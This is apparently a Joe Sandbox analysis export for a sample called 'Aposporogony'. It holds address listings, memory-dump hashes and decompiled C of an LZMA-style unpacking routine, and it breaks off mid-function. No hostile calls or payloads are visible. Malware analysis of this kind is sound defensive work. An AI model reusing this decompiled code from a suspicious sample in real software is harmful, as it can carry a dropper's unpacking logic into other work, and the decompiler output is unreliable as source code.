                                                                                                                                                                                      0x00406d3e
                                                                                                                                                                                      0x00406d41
                                                                                                                                                                                      0x00406d44
                                                                                                                                                                                      0x00406d47
                                                                                                                                                                                      0x00406d4a
                                                                                                                                                                                      0x00406d4d
                                                                                                                                                                                      0x00406d50
                                                                                                                                                                                      0x00406d53
                                                                                                                                                                                      0x00406d6b
                                                                                                                                                                                      0x00406d6e
                                                                                                                                                                                      0x00406d71
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d77
                                                                                                                                                                                      0x00406d7b
                                                                                                                                                                                      0x00406d7d
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d5d
                                                                                                                                                                                      0x00406d62
                                                                                                                                                                                      0x00406d64
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d80
                                                                                                                                                                                      0x00406d87
                                                                                                                                                                                      0x00406d8a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x0040701d
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00407023
                                                                                                                                                                                      0x00407026
                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406dec
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00407378
                                                                                                                                                                                      0x0040737e
                                                                                                                                                                                      0x00407380
                                                                                                                                                                                      0x00407387
                                                                                                                                                                                      0x00407389
                                                                                                                                                                                      0x00407390
                                                                                                                                                                                      0x00407394
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040712c

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406E3E() {
                                                                                                                                                                                      				unsigned short _t532;
                                                                                                                                                                                      				signed int _t533;
                                                                                                                                                                                      				void _t534;
                                                                                                                                                                                      				void* _t535;
                                                                                                                                                                                      				signed int _t536;
                                                                                                                                                                                      				signed int _t565;
                                                                                                                                                                                      				signed int _t568;
                                                                                                                                                                                      				signed int _t589;
                                                                                                                                                                                      				signed int* _t606;
                                                                                                                                                                                      				void* _t613;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                      						L89:
                                                                                                                                                                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                                                                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                                                                                      						L69:
                                                                                                                                                                                      						_t606 =  *(_t613 - 0x58);
                                                                                                                                                                                      						 *(_t613 - 0x84) = 0x12;
                                                                                                                                                                                      						L132:
                                                                                                                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      						L133:
                                                                                                                                                                                      						_t532 =  *_t606;
                                                                                                                                                                                      						_t589 = _t532 & 0x0000ffff;
                                                                                                                                                                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                      						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                      							 *(_t613 - 0x40) = 1;
                                                                                                                                                                                      							_t533 = _t532 - (_t532 >> 5);
                                                                                                                                                                                      							 *_t606 = _t533;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      							L139:
                                                                                                                                                                                      							_t534 =  *(_t613 - 0x84);
                                                                                                                                                                                      							L140:
                                                                                                                                                                                      							 *(_t613 - 0x88) = _t534;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							L137:
                                                                                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							goto L139;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      							L171:
                                                                                                                                                                                      							_t536 = _t535 | 0xffffffff;
                                                                                                                                                                                      							L172:
                                                                                                                                                                                      							return _t536;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eax = 0;
                                                                                                                                                                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                      						L75:
                                                                                                                                                                                      						if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      							 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                      							L170:
                                                                                                                                                                                      							_t568 = 0x22;
                                                                                                                                                                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                      							_t536 = 0;
                                                                                                                                                                                      							goto L172;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__edx =  *(__ebp - 8);
                                                                                                                                                                                      						__cl =  *(__eax + __edx);
                                                                                                                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      						 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      						 *(__eax + __edx) = __cl;
                                                                                                                                                                                      						__eax = __eax + 1;
                                                                                                                                                                                      						__edx = 0;
                                                                                                                                                                                      						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      						__edx = _t274;
                                                                                                                                                                                      						__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      						_t283 = __ebp - 0x64;
                                                                                                                                                                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      						L79:
                                                                                                                                                                                      						 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                      						L80:
                                                                                                                                                                                      						 *(__ebp - 0x88) = 2;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t535 =  *(_t613 - 0x88);
                                                                                                                                                                                      					if(_t535 > 0x1c) {
                                                                                                                                                                                      						goto L171;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M00407395))) {
                                                                                                                                                                                      						case 0:
                                                                                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      							_t535 =  *( *(_t613 - 0x70));
                                                                                                                                                                                      							if(_t535 > 0xe1) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t539 = _t535 & 0x000000ff;
                                                                                                                                                                                      							_push(0x2d);
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_pop(_t570);
                                                                                                                                                                                      							_push(9);
                                                                                                                                                                                      							_pop(_t571);
                                                                                                                                                                                      							_t609 = _t539 / _t570;
                                                                                                                                                                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                                                                                      							 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                                                                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                      								L10:
                                                                                                                                                                                      								if(_t612 == 0) {
                                                                                                                                                                                      									L12:
                                                                                                                                                                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      									goto L15;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L11;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									L11:
                                                                                                                                                                                      									_t612 = _t612 - 1;
                                                                                                                                                                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                      								} while (_t612 != 0);
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *(_t613 - 4) != 0) {
                                                                                                                                                                                      								GlobalFree( *(_t613 - 4));
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      							 *(_t613 - 4) = _t535;
                                                                                                                                                                                      							if(_t535 == 0) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                      								goto L10;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 1:
                                                                                                                                                                                      							L13:
                                                                                                                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t613 - 0x88) = 1;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      							_t45 = _t613 - 0x48;
                                                                                                                                                                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                      							__eflags =  *_t45;
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t547 =  *(_t613 - 0x40);
                                                                                                                                                                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                      								L20:
                                                                                                                                                                                      								 *(_t613 - 0x48) = 5;
                                                                                                                                                                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      								goto L23;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x74) = _t547;
                                                                                                                                                                                      							if( *(_t613 - 8) != 0) {
                                                                                                                                                                                      								GlobalFree( *(_t613 - 8));
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                      							 *(_t613 - 8) = _t535;
                                                                                                                                                                                      							if(_t535 == 0) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 2:
                                                                                                                                                                                      							L24:
                                                                                                                                                                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                      							 *(_t613 - 0x84) = 6;
                                                                                                                                                                                      							 *(_t613 - 0x4c) = _t554;
                                                                                                                                                                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 3:
                                                                                                                                                                                      							L21:
                                                                                                                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
